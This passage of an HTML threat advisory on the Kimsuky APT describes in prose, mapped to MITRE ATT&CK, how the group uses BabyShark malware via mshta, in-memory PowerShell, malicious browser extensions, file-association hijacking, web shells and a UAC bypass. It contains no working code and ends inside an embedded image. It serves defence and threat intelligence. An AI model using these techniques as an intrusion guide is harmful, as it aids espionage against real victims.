href="https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/">16</a>],[<a href="https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/">17</a>]</li> </ul> <p>Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (<em>Phishing: Spearphising Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>], <em>Drive-by Compromise </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1189/">T1189</a>], <em>Man-in-the-Browser</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1185/">T1185</a>]).[<a href="https://attack.mitre.org/groups/G0094/">18</a>]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Execution</h4> <p>After obtaining initial access, Kimsuky uses <a href="https://attack.mitre.org/software/S0414/">BabyShark</a> malware and PowerShell or the Windows Command Shell for <em>Execution</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0002/">TA0002</a>].</p> <ul> <li>BabyShark is Visual Basic Script (VBS)-based malware. <ul> <li>First, the compromised host system uses the native Microsoft Windows utility, <code>mshta.exe</code>, to download and execute an HTML application (HTA) file from a remote system (<em>Signed Binary Proxy Execution: Mshta</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/005/">T1218.005</a>]).</li> <li>The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.</li> <li>The script maintains<em> Persistence </em>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0003/">TA0003</a>] by creating a Registry key that runs on startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1547.001</a>]).</li> <li>&nbsp;It then collects system information (<em>System Information Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1082">T1082</a>]), sends it to the operator’s command control (C2) servers, and awaits further commands.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">19</a>],[<a href="https://attack.mitre.org/groups/G0094/">20</a>],[<a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">21</a>],[<a href="https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/">22</a>]</li> </ul> </li> <li>Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (<em>Phishing: Spearphising Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>], <em>Phishing: Spearphishing Attachment</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001">T1566.001</a>]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">23</a>]</li> <li>Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (<em>Command and Scripting Interpreter: PowerShell </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/001/">T1059.001</a>]). PowerShell commands/scripts can be executed without invoking <code>powershell.exe</code> through HTA files or <code>mshta.exe</code>.[<a href="https://attack.mitre.org/groups/G0094/">24</a>],[<a href="https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/">25</a>],[<a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">26</a>],[<a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">27</a>]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Persistence</h4> <p>Kimsuky has demonstrated the ability to establish <em>Persistence</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003/">TA0003</a>] through using malicious browser extensions, modifying system processes, manipulating the <code>autostart</code> execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.</p> <ul> <li>In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (<em>Man-in-the-Browser </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1185/">T1185</a>]). The extension’s reviews gave it a five-star rating, however the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">28</a>]</li> <li>Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (<em>Boot or Logon Autostart Execution </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1547">T1547</a>]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[<a href="https://attack.mitre.org/groups/G0094/">29</a>],[<a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">30</a>]</li> <li>During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (<em>Remote Services: Remote Desktop Protocol </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1021/001">T1021.001</a>]).[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">31</a>]</li> <li>Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (<code>.hwp</code> files) in the Registry (<em>Event Triggered Execution: Change Default File Association</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/001">T1546.001</a>]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">32</a>] Kimsuky also targets Microsoft Office users by formatting their documents in a <code>.docx</code> file rather than <code>.hwp</code> and will tailor their macros accordingly.[33]</li> <li>Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (<em>Server Software Component: Web Shell</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T505/003">T1505.003</a>]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Privilege Escalation</h4> <p>Kimsuky uses well-known methods for <em>Privilege Escalation </em>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0004/">TA0004</a>]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in <code>explorer.exe</code>.</p> <ul> <li>Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into <code>explorer.exe</code> (<em>Process Injection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/">T1055</a>]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g., <code>dfe8b437dd7c417a6d.tmp</code>) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">35</a>]</li> <li>Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within <code>explorer.exe</code> (<em>Process Injection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/">T1055</a>]).[<a href="https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/">36</a>]</li> </ul> <p align="center" style="text-align: center; margin-bottom: 8px;"><font color="#000000"><font face="Times New Roman"><img alt="" data-entity-type="" data-entity-uuid="" src="https://us-cert.cisa.govdata:image/png;base64,/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAoHBwkHBgoJCAkLCwoMDxkQDw4ODx4WFxIZJCAmJSMgIyIoLTkwKCo2KyIjMkQyNjs9QEBAJjBGS0U+Sjk/QD3/2wBDAQsLCw8NDx0QEB09KSMpPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT3/wAARCAGPATgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrfCvgPwzeeEdGubjRbOSaaxgkkdk5ZjGpJP1Nav8Awrvwp/0AbH/v3VrwZ/yJGg/9g63/APRa1tUAc3/wrvwp/wBAGx/790f8K78Kf9AGx/7910lFAHN/8K78Kf8AQBsf+/dH/Cu/Cn/QBsf+/ddJRQBzf/Cu/Cn/AEAbH/v3R/wrvwp/0AbH/v3XSUUAc3/wrvwp/wBAGx/790f8K78Kf9AGx/7910lFAHN/8K78Kf8AQBsf+/dH/Cu/Cn/QBsf+/ddJRQBw914E8PpqLx23h+ydAI94EQJUHfkgEjuB+FV28DaW0kofwrarGtzGI/LRSxTcd5PPTAH510OrXOo2uoStpduk8rJEHDAnC5fngilXUdbYj/QEG5gpBBGwnIz1+ZRgEkevtWkVpfQRlaZ8PvDrtefavDtsgFw3lb4xymBjGD061f8A+Fd+FP8AoA2P/fuukoqG7jONufAOgJfIkPh2xNuYmO8Qhvn7A8ggfTrUEfgTRm05HbwzZC68tiUMS4LAjHfjIzgfma6q7mv0uiLWKNoUhLncDl27KDniqq6jqCXVt5sA+ytEXuJjGV8sjJxgnvjr2x78UkByCeDbSRQY/CentGWOXaIK4UEg/LuxnA47Zq0ngHT/ALM8snh3TQw2gRLANxB6t97G4Dt0rsJ7yWXR/tenxGSSRA8SSKRnOOo4PQ1Qub/WoJpYorJJzHFlWClVkfjABzwDkjnpjPSq36IRzc/gXw83h0wR6HbNqqwjKRoN+/jPOcfrVK8+HNnJd3Rt/D0CwMw2cAEDBxgZ9cZ6cdc16RZySy2cLzrslZAXXGMHuMVNUqdugzzJfhtZkStNoVoZBIpVEXCO2T33AhCCM47joeaYfhvZb4PL8PwhQ/zh+TuzyfvfdxjGcj2r1Cin7TyA8ttPhtbgW4k0G1A80ElhnH3c5GeVxu7/AEA4rrv+Fd+FP+gDY/8AfuukoqZS5gOP1fwB4Xg0a+li0OyWSO3kZWEfQhSQabovgHwvc6LZTTaHZNI8KszGPqcV0eu/8gDUf+vWX/0E03w//wAi9Yf9cE/lUgZn/Cu/Cn/QBsf+/dH/AArvwp/0AbH/AL910lFAHN/8K78Kf9AGx/790f8ACu/Cn/QBsf8Av3XSUUAc3/wrvwp/0AbH/v3R/wAK78Kf9AGx/wC/ddJRQBydp8P/AAtIkpbQrI7ZXUfu+wNWP+Fd+FP+gDY/9+62rD7k3/XZ/wCdWqSEtjm/+Fd+FP8AoA2P/fuj/hXfhT/oA2P/AH7rpKKYzzzx14I8Oad4I1a7s9GtIbiKAskipypyORRW78SP+Sea3/17H+YooAueDf8AkSNB/wCwdb/+i1rZzWN4N/5EjQf+wdb/APota2aADNGaKKBBmjNFFABmjNFFABmjNFFABmjNFFAGBq99fWGoSvp9qLmRkiVlIPyjL88UJrWqOTjTchmCYwwMbHIG71AwCSOMEVJqOoSabfzzRW7XDFIlKLnIGX+bp0HU+35UkeuXk9ysMNhks5XczFQuATgnHXj6fMK0W2wG5S0UVmMzdQub+O4ZLSFDGsDSM7AklucKoHBPeotF1KSe3ihvyRdy72VSmMopAz0HqOoGafqOrzWV9HBHZvMrRtIWBx0zwPU8dPeqVhrtxLdxRz24Kys5M4VgsagnAOR3A4+h9s6WbjsIu31zfrLdLCqRwRQ7hIVLOWIPQdDjA/OmWV5dT3tqGLtE9qHlBTG1+PYY7+v4VZutTWPR21C1Q3SFA6CP+IHHP05zWTJ4ivA6sLJjshLtAmWaQ/Lja2Mc5IHPXrihJvoB0lFQWc5urOGdl2GRAxXnjPbmp6zGFFFFABRRRQBQ13/kAaj/ANesv/oJpvh//kXrD/rgn8qdrv8AyANR/wCvWX/0E0zw/wD8i9p//XBP5UAaOaM0UUCDNGaKKADNFFFAytYfcm/67P8Azqzmqth9yb/rs/8AOrVJbCWwZozRRTA5n4j/APJPNb/69j/MUUfEf/knmt/9ex/mKKBl3wb/AMiRoP8A2Drf/wBFrWzWL4N/5EjQf+wdb/8Aota2qYgooooAKKKKACiiigAooooAKKKKAMm5vRZavIdm4yrFGCW2qPvnJPbp+dQSeIhLK6xDyRDdRxFpOkgZipx6EYNN1bWY9F1CWWWCSYSJEgVMccvzzTh4ptnP/HrMQxAjIwdzHIUHngkgjBq4x0vYC7pN694b1ZHRzBcvEpUY+UYxn860aQADoAKWoeoylcaiIL5LURbmaIyZLBc47DPU/wAqrLrUc+mC5aAlWidmiJ+bg4Ixjkc8np9asXF+Y79LSO3aRjH5jPkBUGcc556+lZll4l+03GmwmKNftMbNIwJ2qQDgKcc/dOfTiqUbrYQ1fF0CKqCzk3ZCrsOY8cjO7oAMflzVhPETvbyT/YXWJNql2cAbjj/x3n71Xrm7t9P0t7qJBJCo3hYsfNk9u3OaoXHieC0kkjuLaRXii8yRAQxXGMjA6nBBGOtOyeyAfPq1xD4UGpYiE/krIQ4O3J7Y61m3vii9hvbmGGGN0RtqPtJA64yc98Y5x14zW5YwWlwqajHAqyTpv3ZycH9KvYHoKSklugOXj8SX8gkke2EUcbrvUr84GSCgGeW4BHTqeKYfE18GiCxxSBzklUPXPMfX7w68evSurwPQUYHoPWnzx7Ac2fEN4BZFIkka4bLoFIKfMoMec/eAJP4dK6WkwPQetLUyaeyGUNd/5AGo/wDXrL/6CaZ4f/5F7T/+uCfyp+u/8gDUf+vWX/0E0zw//wAi9p//AFwT+VSBo0UUUxBRRRQAUUUUAVbD7k3/AF3f+dWqq2H+rm/67v8Azq1SWwlsFFFFMZzPxH/5J5rf/Xsf5iij4j/8k81v/r2P8xRSGXPBv/IkaD/2Drf/ANFrWzWN4N/5EjQf+wdb/wDota2aYgooooAKKKKACiiigAooooAKKKKAMPU9VtdI1GaW8jeRXSJFCKGOcv605fEWmg5WJ8SHchEY/eHkD8SVIGeeKTUtQsdO1GaTUV3RukSqPL385ftT11nR1OVRRvPmKRD/AKwjOCOOTwcfSrS02A2qKKKzGZ9/qcVpM0RgeVxCZWIA2hR6k9Bmo9GuodU0oFoI4gxdDEnHTg8cEVNeahaWtz5c6sWMRZmEZYKn+0ewqhY6hp0uowILZoLrEkcEezHyA/McDgdFz9RVpabCLM19FYpLZ2tmWFtCGCgBY1GDtGe33fSm22oLcajbo9vF/pFsJlkHJyMcZxz17Vcv5La1s557pFMQX958m7cPTHfrVBNQt7eaUQ2KQeXbCUPIBH8oOCDxkAYoWq2GbCqFUBQAB0ApahtLj7VZwz+W0fmoH2OOVyOhqaoAKKKKAI0l3o7BCCpIwSOcVl2ettcm2WSNY5JJHjkTJyjKu7bzjnHfpV+1hit4ZRBE6gyOzAjl2J5PPrWXb6npsixCWzSORdzFBDkwYxuLcfL1Ga1jFO+lxEWq69bXGk3VuqTeZPaylflyANrDcSOMHB5rQ8P/APIv2H/XBP5VBqEdrJ4avJoLZYgLWXy8xhSAVPT0zU/h/wD5F7T/APrgn8qiVr6IDQooopAFFFFABRRRQBWsP9XN/wBdn/nVmq1j/q5v+uz/AM6s0lsJbBRRRTGc18R/+Sea3/17H+Yoo+I//JPNb/69j/MUUhlzwb/yJGg/9g63/wDRa1s1jeDf+RI0H/sHW/8A6LWtmmSFFFFABRRRQAUUUUAFFFFABRRRQBh6ndabaajM+qhDEyRBN0Zf5sv2ANPW+0JCcLEvzeaP3RwxXOGXjnvjHfNLeQ2M2pzDUER02RbAwJ+bL9AKa6aTBIEhto5WS5jV1U8xMSdpwe2SeB6mrVrdRm5RVWxvReifEbIYZmhYE5yRjkfnVqs2rDKN3eWFvdeVc7fNkiO4lCR5ffccYA+tU4/7HM0FvFCIZ5kJhAiKvjnLDjjqcn3GetX7g2YnIuPL8ySPYQ3dPT6dapGHRwyMrqsqIVjk3ksg5HBP1P6elaJadRFuZLLTdJ8ucAWcCBSGBbgdPUntVC6u9DmeSS8RNzQ5kaWMjEYI656AHBOenWrkYsP7OitDIJYAioPMYsSB0yfXimvY6VeXkjvFFLNIuHySdwGOo6dh+VCVt7gXbV45LWN4M+UygpkEcdutS1HDClvCkMS7Y0AVV9BUlZjCiiigCnbJBaWs5jEhUO7vvzlmzk9f/wBVULDUdNYhFtfJndSfLKBmKlQ3UdcgitO3s44IZI9zyCV2dt7Z+91HsPaoo9HsYREEgAETb0BYnDYxnrycetaKUdbiKM01vceDbqa0heGGSzkZUddpAKHtVnw//wAi9p//AFwT+VN1O2is/DOoQwLsjW2lwuSQPlPTNL4f/wCRe0//AK4J/KpbTbsBo0UUUhBRRRQAUUUUAVrH/Vzf9dn/AJ1ZqtY/cm/67v8AzqzSWwLYKKKKYHNfEf8A5J7rf/Xsf5iij4j/APJPdb/69j/MUUikXPBv/IkaD/2Drf8A9FrWzWL4N/5EjQf+wdb/APota2aZItFJRQAtFJRQAtFJRQAtFJRQAtFJRQBjX81lBqjPfuYwfJWJgxBDkuByPxpVstEWaRY5Y1le4UuEnIJkBLKOvqScUt/9m+23DXbsiIsDqVOG3hnxinxaRpkvmxQspKTeY4RhuRsk9RyOSf1qlsMm0h7CRLmTT5C6vOxlJYn5wcHr06Vo1BbWiWgkWIttd2k2scgEnJx+Jqepe4yleGwFwi3TR+cw+RC3zMPYd6pw3GlXT2SKrF7tC0QIYHC+vp+NW7g20WpxGRXE80bIj4+UBfmPPY9/wqjb6RpaG2e1uM3Cowt5POLEjkdAcMBuNWnZbsRoSWtlawu8oWOJQdxZsKB0yarLqWmQPNJG3EcAlZ1BKlOnB7njHFJdS2MVidO1G6eQpAHkZwdzqCBuJAxknHT1qncz6FeztLNcM2+IAICwBAYHgAZ3AkHHXmhXe9wN23nS6top487JUDrkYOCMjipayLHVtKgtI7ezuDJHDCCoUM5KDAyD1OMjPpnmp/7d08+btn3eUu5yqMcD16dPX0qXF9hmhRVeC+t7m4mghlDyQbfMA/hyMjn6VYqQCiiigChrv/IA1H/r1l/9BNR+H/8AkXtP/wCuCfyqTXf+QBqP/XrL/wCgmo/D/wDyL2n/APXBP5U0JmjRSUUCFopKKAFopKKAK1j9yb/rs/8AOrVVbH/Vzf8AXZ/51ZpLYS2FopKKYzmviN/yT3W/+vY/zFFHxG/5J7rf/Xsf5iikNFzwb/yJGg/9g63/APRa1s1i+Df+RJ0H/sHW/wD6LWtmmIWikooAWikooAWikooAWikooAWikooAxNaVlN35kUxgmhjVnji8zABbPAPXkVXtfENjazXEnlanIZ33ndaHj2yB0+tdHRT8guY3/CXWX/PrqH/gK1H/AAl1l/z66h/4CtWzRSsO5zF/rWn6jJGZY9UVEV1KLanDBhg5OM9D2qG21Owsp2uLdNT89lw5ktCVc5JBIAGOp6YrraKd3awrnI3eqWeoSGS6GphmhMJWK0IXaSD3BPYe1VU/sEp8sGqnAG1jbk7WGPmHHsBjp7V2V5dw2FpLc3LhIYl3Mx7CoNHuIrvS4riF1kjlLOGXpyxoU2nZM05Hyc9tL2OVVtEVJlt49XiEgKEpbnjkbh0/i2jI+uMZp7z6W7zuo1hGn279ttwQDnaRjke3px0rq40uITIEjiZWdmBLkdT9Kdvuv+eMP/fw/wCFHtJdWZXMCy1rS7C4mmhttU3TY3hoHIzknIHbkmrv/CXWX/PrqH/gK1aW+6/54w/9/D/hRvuv+eMP/fw/4VLd9x8xm/8ACXWX/PrqH/gK1H/CXWX/AD66h/4CtWlvuv8AnjD/AN/D/hRvuv8AnjD/AN/D/hQHMYWqeJ7a60m8gitdQMksDooNsw5KkCtbQ0aLQrFHUqywqCD2OKn33X/PGH/v4f8ACjfdf88Yv+/h/wAKLi5ixRVffdf88Yv+/h/wo33X/PGL/v4f8KdwuWKKr77r/njF/wB/D/hRvuv+eMX/AH8P+FFwuWKKr77r/njF/wB/D/hSwzO8zxyxqrIAflbIIOf8KLhcbY/6ub/rs/8AOrNVbH/Vzf8AXZ/51ZoWwLYWikooGc38Rv8Aknut/wDXsf5iij4jf8k91v8A69j/ADFFJjWxc8Hf8iToP/YOt/8A0WtbFY/g7/kSdB/7B1v/AOi1rYpkhRRRQAUUUUAFZ2vX02n6cJbdkR2lSPc65ADHBOK0ayvEenpqumpYyu6RzzKrMnUDk8flQNbmLaeKJrjWnsG1G3by4mldkt+gH/AjV5Nb86+jtbfUo3keIy48kAgAccZ71l6X8P8AR9IupLux1Cd55oXi5dZC6nqAPXin6L4Y0q21KC5sJZkuLi3LrI0I+ZOAQfcZHFaWi0n2X3v9BK/Kk9yzbazqVxqEMAurRo5G2lkTJHGeO1b/ANlvv+f5f+/A/wAapQ+G1gmSaO5xIhyD5KZz+VXJIbmJC8mpBEXqzRKAKmbi37qHFWQv2W+/5/l/78D/ABo+y33/AD/L/wB+B/jUf735v+JqnygFvkTjPTNKBKZWjGqp5i9V2JkfhUFD/st9/wA/y/8Afgf40fZb7/n+X/vwP8ai3uAT/bEWA23O1Ovp9aSCSW5nnhh1Pe8BAkxCuASM4p2YE32W+/5/l/78D/Gj7Lff8/y/9+B/jVA6nEPLJ1kASMyqTABypwc8cc8ZNN/tiDAJ1oDJI5gAwRzzxx7Z60cr7AXbjTrq6tpYJr1GjlQow8gcgjB70lppdzY2cNtb3irFCgRB5A6AfWqbatEqB21dlUxiQE23G05x26nBwOtPXUkdWZdVYqib2P2bhRkjnjrkEY60cr3sPmduW+he+y33/P8AL/34H+NH2W+/5/l/78D/ABplutxdQJNDqJaNxkHyVFSfZbz/AJ/z/wB+VpCE+y33/P8AL/34H+NH2W+/5/l/78D/ABpfst5/z/n/AL8rR9lvP+f8/wDflaAE+y33/P8AL/34H+NH2W+/5/l/78D/ABpfst5/z/n/AL8rR9lvP+f8/wDflaAE+y33/P8AL/34H+NH2W+/5/l/78D/ABpfst5/z/n/AL8rR9lvP+f8/wDflaAE+y33/P8AL/34H+NH2W+/5/l/78D/ABpfst5/z/n/AL8rR9lvP+f8/wDflaAIrG7Z768s5plkltypyE2/Kygj9c1erB0lJE8V6wssnmNsh+baB/D6Ct6mSwqCP/kITf8AXNP5mp6gj/5CE3/XNP5mhksbY/6ub/rs/wDOrNVrH/Vzf9dn/nVmhbAtgooooGc38Rv+Se63/wBex/mKKPiN/wAk91v/AK9j/MUUmUti54O/5EnQf+wdb/8Aota2Kx/B3/Ik6D/2Drf/ANFrWxTJCiiimAUUUUAFU9TRZEgjf7rzBW5xwQauVR1eFbm3ihckLJKEJHUAgigEQDQrcz2cxvZme1UiL5lxxkA4AxkA/wAs1LZaKtnLaOl3O4tYmhVW24YEgnOB14HT0rN07wrprW0b21zJLbNyOnOMjg4yOpz64Fb1jaLY2iQq7SYyWdurk8kn61Un2ZRYqtf2sd3amOSRowGDh1x8pByDzx1HerNV72zjvoBFMMoHVyMZBwc4PtxULcZVXTIVuriVbpw86qGUbccfxYxgk46mqdz4Vtry6eZ7mcI2WUIwBUtknBx0O7v6CifRLC9N3ZLdbfMZXeOPbvjxjAB6gcDj8O9aEbSWPmNeXEfkFkSBVTG3gDHHUk/lV3a2Yira6Bp9pIhDGQRHaiyFSFGCAvTn7x6806x0r+zC/wBgmDiTG7zju2gcADGPfrUN3oFlIkdsZ2heSVpCVwGlOS3PrjPFXdL0mPSzceXIz+fJ5jbgOCeuMdvbtQ3puBTfwtbzMhuLm5l2yvJglRy5yRwOPw5xxSQeE7GCWKVGk8xOrHHzY+7njt+vfNaZ1C1VA7XEYQnAbPBqbzE8vzNw2Y3bu2Kn2ku4aGK/hO0kikiaafy5F+dRtALc/NjHH3jx09qlj8N2MUEsKl98sQjL8bguSeOMAZPTpWkt1A8BnWVDEATvB4pnlSnUVm3RiERFcbfnLZB69hx0pqbfUCCxlsrEJpkVxmSBcbXPOOvXp0I4HQVd81OfnXgZPPasubR7C4vLiSRw807qSCwO3aF4A9wBn2NNn8O2xkeUStGoO8KANq4wcH1X5eh4FVam+oGuZEGSXUY689Kjmu4IP9bKi8E8n0GT+lY66JY3b3ZhuCZJmSRnH3k7rjtj0oOhWF7c3aGd3beTJGOiMy4z9SDn0oUafcLm2JYyAQ68nA5qFtQtlnEPmAuX8vABOGxnB/CspfClsJ3mkuJ5HYlstjg+v14otNLtXQtbX5dY597lQvUKVwT64JyeuafJT7/gGpuhgwypBHtS1Q0awt9O09Y7V/Mjf5w/97IHP5AVbaeJH2NIgfgbSeeen8jWTWtkMkopKhivbeabyo5lZ9u/APbOM/nxRZgY+n/8jhrH+5D/AOg1t1iaf/yOGsf7kP8A6DW3QQ9wqCP/AJCE3/XNP5mp6gj/AOQhN/1zT+ZoYmNsf9XN/wBdn/nVmq1j/q5v+uz/AM6s0LYFsFFFFMZzfxG/5J7rf/Xsf5iij4i/8k91v/r2P8xRUspbFvwd/wAiToP/AGDrf/0WtbNY3g7/AJEnQf8AsHW//ota2aokKKKKACiiigAqpf8AH2U/9PC/yNW6qX/W1x1+0Lj8jQwW5lWvh9LiK3uItQ80JG6xyRg7QWLHcBnH8WDnOcCtjSrD+zNPjtfMMgQkgkY6knH0GayIvD97CkLNfonkxyD5QwQEljuxnn73IPoK09HiFpYxWz3aXEmC4YHqpORj2GcVUndblGhVa/sk1C28iU/uy6sw/vAHOD7HFWap6rZy39g8EMxickHPYgHofY1C3GZq6PJY6hcTafcRC4lQBIpBwi5XJ65OAMcYznmtPUYJZ4ovJClo5kkwxxkA881izeF7qWSR11Fo2ZAiygEyIMg9c89MfQnvW1ZG5DzRziERR7Vi8sknG0Zzn3zj2q2+twMptAsrxiILhWlhndpnAydzZPrwwB49KbpPh1UtYJHvXZhKs3+juQjEZHPrnPJ9qsw6RJJJILklYxdyTAI5G8MOOhGMH+VUrTwzPDHEsWo4WKXcVTdtcA/dPPfv7ge+XzaWuI0jpkaKIXuFVXkZ1iAwM7cAKCe3X61Ha6Xaxz28kN25FtuZY43wpBAByB15FDaNPtjj+1maMTPKxnXLcnIAIxwPTvTLPQXtZY5TOC8ZH3QRkZ5HXv71hrGWiItZ6IVdJhvraJ4bvfCYtiug+o4Pbrz9BSjw8ufnnZhsCcgjjOfXv39+at6VG1rYxwT7Um3MxTcD1Yn+tSbZTqgYLH5KwkFtx3biRgY6YwDVOnG5XIuxl/2FbtLJFHejzQSzJwcKVAwVzwMDrTpdBiitmaS7IG3Du4yGGAMNzyOP1pl74dmur25njuli8x/MTahDElVUqxzyuF7evtT5NEujFcJHcp+9hSNfM3MQy4+bOc9ulX7KlpqTyLsSSaEZIjG0+Y8RrjaRkICOcHvnP5VPax/ZdRvHmkiVZPLCLvycAbQTn1NVrrQpZ4ZSLplnllDuQzBSv9zrwPQiq0nheaaWVpL7IcghtmWJG4qWJPbd2x0FVCFNfaKStsjas4ZYjcGYRDfMWQRg/dwMbvU8Vn3Hh4TsD9oZR5ryfd6FmDZHoRjGfQmkj0e6Voi90khSYyNkN+8B7nnqO3amwaHdQmE/bC7JOZGdiTuGMdM4z/8ArpppaqQyJfCirFFH9rkZY1dVJyCNw+9kHkjp9OKVfCkceTHdSIQVKYHCYB7ZwfvE1p6VZy2Fn5M0okO8kEZ4B7Enkn3q7Q6009GFkc9F4TWMAi8feBgHbwF+b5evT5untTz4aY24gW6CIIDFhI9vV9/Y9OMY9K3qKXtp9wsjmtFgW18S6nAv3Y4YFHJP8PvzXQ1iWH/I4ax/uQ/+g1t1F7ksKrx/8hCb/rmn8zViq8f/ACEJv+uaf1pMTEsf9XN/12f+dWarWP8Aq5v+uz/zqzQtgWwUUUUxnNfEX/knut/9ex/mKKPiL/yT3W/+vY/zFFJlLYt+Dv8AkSdC/wCwdb/+i1rZrG8Hf8iToX/YOt//AEWtbNMkKKKKBBRRRQAVT1IM6W6o2xjMArYzg4ODVyqeorvW3XJG6dRkHBHBoGtysum6mLmycXiiKBT5se5m8085yT2PH0xRp2k3VpLp7SG3K21u8L7c5JJBGOOny/rVe00nVLcWkf2yZYoYSjATbiz8jJLDkHjHpirFhpl7DfW1xdTPIVtzFIBOxGckgkHgkg/nVt+ZRtVW1CCa4tDHbyeW+4HOSMgHkZHIyO4qzVPVYbq4sHjspTFKSPmBwcZ5APY471mtxkC2N4tzcv54aGVU2Rl2yjDGcEdB/nNQXGl3fnq0EgUM7bmVipIOSCfXBxxVafTtfeSbyb9Y8oixszZwRjkrjGSMg44yQe1bNnJOxljmt2jSLaqSM+4yfKMn8+PetOZx1RUJuGxUXTbznfeyM24nO4gdO